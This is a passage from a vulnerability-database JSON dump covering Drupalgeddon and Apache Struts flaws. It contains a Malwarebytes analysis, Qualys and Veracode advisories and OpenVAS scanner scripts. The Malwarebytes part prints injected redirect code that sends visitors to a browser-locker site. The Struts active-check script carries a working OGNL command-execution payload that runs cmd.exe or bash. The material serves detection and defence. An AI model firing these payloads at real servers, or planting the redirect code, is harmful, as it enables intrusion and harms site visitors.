The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. 
We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. 
In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-18T15:00:00", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions 2.3.34 and 2.5.16 and before are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). 
A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to detect programmatically with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n   * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n   * **Authenticated (Linux/Unix)** - This executes the ps -ef command, looks for the presence of the Tomcat process and finds the location of the struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat authentication record to specify the location of the Tomcat configuration file. Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for the struts-core.x.jar file under subdirectories. It extracts the version from the .jar file and compares it with the vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later.\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially crafted payload to the scanned web application. 
A vulnerable application will show evidence of a command executing on the server, and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every out-of-the-box template and generic policy. These templates, developed by security experts for the Qualys WAF programmable inspection engine, are constantly tested against the latest threats for the best detection rate and fewest false positives.\n\nCustomers using manual policies instead of templates were potentially not protected, though, depending on the ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) slider settings, along with the blocking threshold.\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or, of course, by applying a **virtual patch** to QID-150250 from within the WAS module, which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF without needing to define manual rules, giving CISOs and IT security organizations time to implement sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the 
vulnerability.", "cvss3": {}, "published": "2018-08-23T20:27:19", "type": "qualysblog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-7600"], "modified": "2018-08-23T20:27:19", "id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "veracode": [{"lastseen": "2023-04-18T15:19:42", "description": "drupal is vulnerable to remote code execution (RCE) attacks. The library does not properly sanitize URL endpoints where array objects can be supplied to request parameters, allowing a potential compromise of the PHP application, and even the underlying operating system (OS). This vulnerability is related to CVE-2018-7600.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T10:18:46", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2018-7600", "CVE-2018-7602"], "modified": "2019-10-10T03:41:43", "id": "VERACODE:6198", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6198/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:07:35", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.11.59. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHBA-2019:0023 Space precludes documenting all of the bug fixes and enhancements in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html All OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-16T03:23:55", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-06-13T20:21:27", "id": "VERACODE:19781", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19781/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:12:12", "description": "lucene-queryparser is vulnerable to remote code execution (RCE). This is possible through the use of an XML external entity expansion (XXE) attack and the Config API with add-listener command\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-16T00:44:41", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12629"], "modified": "2022-04-19T18:29:35", "id": "VERACODE:5281", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-5281/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2023-04-18T12:34:52", "description": "JMX-console is vulnerable to information disclosure. The JMX Console configuration only specified an authentication requirement for requests that used the GET and POST HTTP \"verbs\". A remote attacker could create an HTTP request that does not specify GET or POST, causing it to be executed by the default GET handler without authentication. This release contains a JMX Console with an updated configuration that no longer specifies the HTTP verbs. This means that the authentication requirement is applied to all requests.\n", "cvss3": {}, "published": "2020-04-10T00:42:53", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738"], "modified": "2023-02-13T07:27:47", "id": "VERACODE:23989", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-23989/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T11:26:43", "description": "Sonatype nxrm is vulnerable to remote code execution. 
The vulnerability allows high privilege users such as administrators to run arbitrary code on the server (with Nexus process privileges) by injecting arbitrary Java Expression Language (EL) expressions.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-17T02:10:16", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10199"], "modified": "2022-10-07T14:28:06", "id": "VERACODE:25043", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25043/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical 
Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n 
security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. 
Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n 
\"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 